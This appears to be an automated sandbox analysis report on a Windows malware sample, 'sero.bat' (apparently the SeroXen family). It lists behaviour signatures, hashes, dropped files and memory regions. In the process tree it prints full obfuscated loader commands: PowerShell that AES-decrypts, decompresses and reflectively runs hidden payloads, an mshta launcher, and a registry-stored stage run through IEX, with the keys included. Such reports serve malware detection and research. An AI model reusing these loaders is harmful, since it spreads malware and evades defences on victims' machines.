Analysis
-
max time kernel
26s -
max time network
18s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
-
submitted
02-10-2023 21:46
General
-
Target
sero.bat
-
Size
12.4MB
-
MD5
46392f93dbe11365dcc6057a0e0c3c6f
-
SHA1
f5e14d896d366a2d0c856aebff5ec1c7e9f5197e
-
SHA256
4c6e90e178396d000b5dd5c5bb2b9ae5bbbca5986f26ffad2a6bd0845b6b2c83
-
SHA512
148f834fa1bed7acb833ad90c2e1782ac4af06a386ed45e95c0dae3b69cd6950330e9827f188a9cf71150db732737751f979d29814e0dde69e1d48dbb283cff3
-
SSDEEP
49152:UibWQBcVln6vHr2y7++rl77xFiIf5n/IXNgbNTcw3fbRGI6U1MaRaLkFXhzhLBxV:V
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{370b7419-547b-4245-958d-6955e81d6447}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sero.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\sero.bat.exe"sero.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function OhDeL($VLnrL){ $aXSjO=[System.Security.Cryptography.Aes]::Create(); $aXSjO.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aXSjO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aXSjO.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iwu12OK8WWyxy2/r/fXOnqtAhiQmstP+JhEXQCQfqPI='); $aXSjO.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mijonkYYEu0J8yLQDV5vNg=='); $YWePC=$aXSjO.CreateDecryptor(); $return_var=$YWePC.TransformFinalBlock($VLnrL, 0, $VLnrL.Length); $YWePC.Dispose(); $aXSjO.Dispose(); $return_var;}function hzpfu($VLnrL){ $cxxQm=New-Object System.IO.MemoryStream(,$VLnrL); $YnLaf=New-Object System.IO.MemoryStream; $fTxDe=New-Object System.IO.Compression.GZipStream($cxxQm, [IO.Compression.CompressionMode]::Decompress); $fTxDe.CopyTo($YnLaf); $fTxDe.Dispose(); $cxxQm.Dispose(); $YnLaf.Dispose(); $YnLaf.ToArray();}function kTEJI($VLnrL,$DRTbt){ $tNdAg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$VLnrL); $Ujdld=$tNdAg.EntryPoint; $Ujdld.Invoke($null, $DRTbt);}$TExfK=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sero.bat').Split([Environment]::NewLine);foreach ($QLAsh in $TExfK) { if ($QLAsh.StartsWith('SEROXEN')) { $zWJDv=$QLAsh.Substring(7); break; }}$StmMq=[string[]]$zWJDv.Split('\');$mZupC=hzpfu (OhDeL ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($StmMq[0])));$nZwkL=hzpfu (OhDeL ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($StmMq[1])));kTEJI $nZwkL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));kTEJI $mZupC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{58bbb5f1-e234-4b43-a7d1-b050440794f3}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%2⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function WDqsH($QqiMQ){ $yfdMg=[System.Security.Cryptography.Aes]::Create(); $yfdMg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yfdMg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yfdMg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo='); $yfdMg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA=='); $dPssD=$yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')(); $vbpQn=$dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QqiMQ, 0, $QqiMQ.Length); $dPssD.Dispose(); $yfdMg.Dispose(); $vbpQn;}function ZbSkn($QqiMQ){ $aDlrM=New-Object System.IO.MemoryStream(,$QqiMQ); $PbRBT=New-Object System.IO.MemoryStream; $VprFY=New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::Decompress); $VprFY.CopyTo($PbRBT); $VprFY.Dispose(); $aDlrM.Dispose(); $PbRBT.Dispose(); $PbRBT.ToArray();}function cEHWM($QqiMQ,$bbJgy){ $TxSfZ=[System.Reflection.Assembly]::Load([byte[]]$QqiMQ); $tpznJ=$TxSfZ.EntryPoint; $tpznJ.Invoke($null, $bbJgy);}$yfdMg1 = New-Object System.Security.Cryptography.AesManaged;$yfdMg1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$KRTqO = $yfdMg1.('rotpyrceDetaerC'[-1..-15] -join '')();$gcGOE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8n1l73NGddDdRxG42gPYiw==');$gcGOE = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE, 0, $gcGOE.Length);$gcGOE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE);$QRPDA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGpDNlon+IGNZlDoKYh/CEYBRa4S+ZHu1B70zY9cwMA=');$QRPDA = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QRPDA, 0, $QRPDA.Length);$QRPDA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QRPDA);$GaeUG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rpm81cgQxWQeYHUZpMovqQ==');$GaeUG = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GaeUG, 0, $GaeUG.Length);$GaeUG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GaeUG);$eseMN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hUoupuHhMa4na+h2TJI0Er5Gc4kqi6sGr00/HWtfX8Be1iAlyWhtr/ObmiCu6xI5SnMUqTV6m6bwoUtMbLUtY10c8YBf6pNVSdWrzHM4pnXNzXKQ87RW7mPAAwKaunGhKVxZKkEG4xYtm99CWXDIEmqWLBWq+pXwJC9cihgZsZkfFDYobfwN0Z5xtciUZAwuyvzH60/cONCUWKrAzdP6Onkqh+zZZK2FHEPUbSyu/LnfAb4uax7uoqmEtzxZ/fW119dEan1fjkFCR79zzFDcZVYQUKiWqQqS2Ek/7qCwsuj3v515pNkWTi4TffhMgdakq6i1ZmYILogATm9MnWpE9PRpN1macB6SNTSAyN5cdpPNIn2ozbUfCnuzoDIEKsfOzpur/w7fB8G8GTAYZOwnVbj47WQDJKZeRt9vo9KqwIQ=');$eseMN = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eseMN, 0, $eseMN.Length);$eseMN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eseMN);$FuEBF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g6uAMApUxkExGGhM4FN3ZQ==');$FuEBF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FuEBF, 0, $FuEBF.Length);$FuEBF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FuEBF);$YsLLR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DLgOUFYtRlYOUrIuUaKKdg==');$YsLLR = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YsLLR, 0, $YsLLR.Length);$YsLLR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YsLLR);$twswF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izHZIeNsTWReQRqAPbaMbA==');$twswF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($twswF, 0, $twswF.Length);$twswF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($twswF);$tuAlw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GX+xpROJQFGoaxfmnJNXow==');$tuAlw = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tuAlw, 0, $tuAlw.Length);$tuAlw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tuAlw);$ZBFmj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVLeF6i1oCz901n7Ky8b2g==');$ZBFmj = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZBFmj, 0, $ZBFmj.Length);$ZBFmj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZBFmj);$gcGOE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F3VH0Tp8k7zoccwaIE4hKQ==');$gcGOE0 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE0, 0, $gcGOE0.Length);$gcGOE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE0);$gcGOE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rF9tWOqGvlln0DPgm6Kvyg==');$gcGOE1 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE1, 0, $gcGOE1.Length);$gcGOE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE1);$gcGOE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a0pcGJ1ctfG5WTMhMOT9Zw==');$gcGOE2 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE2, 0, $gcGOE2.Length);$gcGOE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE2);$gcGOE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ndk0pwdH94NwFQHMwCgBcA==');$gcGOE3 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE3, 0, $gcGOE3.Length);$gcGOE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE3);$KRTqO.Dispose();$yfdMg1.Dispose();if (@(get-process -ea silentlycontinue $gcGOE3).count -gt 1) {exit};$SKaRD = [Microsoft.Win32.Registry]::$tuAlw.$twswF($gcGOE).$YsLLR($QRPDA);$lHaHc=[string[]]$SKaRD.Split('\');$gHUaE=ZbSkn(WDqsH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[1])));cEHWM $gHUaE (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$wJhoA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[0]);$yfdMg = New-Object System.Security.Cryptography.AesManaged;$yfdMg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$dPssD = $yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')();$wJhoA = $dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJhoA, 0, $wJhoA.Length);$dPssD.Dispose();$yfdMg.Dispose();$aDlrM = New-Object System.IO.MemoryStream(, $wJhoA);$PbRBT = New-Object System.IO.MemoryStream;$VprFY = New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::$gcGOE1);$VprFY.$ZBFmj($PbRBT);$VprFY.Dispose();$aDlrM.Dispose();$PbRBT.Dispose();$wJhoA = $PbRBT.ToArray();$mLeMR = $eseMN | IEX;$TxSfZ = $mLeMR::$gcGOE2($wJhoA);$tpznJ = $TxSfZ.EntryPoint;$tpznJ.$gcGOE0($null, (, [string[]] ($GaeUG)))3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ap21aa3.t2l.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\sero.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\sero.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Windows\$sxr-powershell.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows\$sxr-powershell.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/1752-50-0x00007FFB25D80000-0x00007FFB26841000-memory.dmpFilesize
10.8MB
-
memory/2916-36-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/2916-34-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/3404-18-0x0000017380000000-0x0000017380024000-memory.dmpFilesize
144KB
-
memory/3404-22-0x0000017380320000-0x0000017380D6E000-memory.dmpFilesize
10.3MB
-
memory/3404-25-0x0000017380E20000-0x0000017380E76000-memory.dmpFilesize
344KB
-
memory/3404-26-0x0000017380E80000-0x0000017380ED8000-memory.dmpFilesize
352KB
-
memory/3404-27-0x0000017380EE0000-0x0000017380F02000-memory.dmpFilesize
136KB
-
memory/3404-28-0x00007FFB44EF0000-0x00007FFB450E5000-memory.dmpFilesize
2.0MB
-
memory/3404-30-0x00000173811C0000-0x00000173811CA000-memory.dmpFilesize
40KB
-
memory/3404-4-0x00000173C15E0000-0x00000173C1602000-memory.dmpFilesize
136KB
-
memory/3404-14-0x00007FFB25D80000-0x00007FFB26841000-memory.dmpFilesize
10.8MB
-
memory/3404-24-0x0000017380D70000-0x0000017380E14000-memory.dmpFilesize
656KB
-
memory/3404-21-0x00000173D9780000-0x00000173D9790000-memory.dmpFilesize
64KB
-
memory/3404-20-0x00007FFB44500000-0x00007FFB445BE000-memory.dmpFilesize
760KB
-
memory/3404-19-0x00007FFB44EF0000-0x00007FFB450E5000-memory.dmpFilesize
2.0MB
-
memory/3404-17-0x00007FFB25D80000-0x00007FFB26841000-memory.dmpFilesize
10.8MB
-
memory/3404-16-0x00000173D9780000-0x00000173D9790000-memory.dmpFilesize
64KB
-
memory/3404-15-0x00000173D9780000-0x00000173D9790000-memory.dmpFilesize
64KB
-
memory/4456-33-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/4456-31-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB